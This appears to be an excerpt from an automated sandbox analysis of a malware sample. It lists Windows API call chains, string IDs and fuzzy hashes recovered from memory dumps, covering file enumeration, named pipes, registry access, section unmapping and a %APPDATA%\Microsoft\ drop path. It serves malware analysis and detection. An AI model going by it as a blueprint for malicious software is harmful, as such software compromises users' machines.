  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
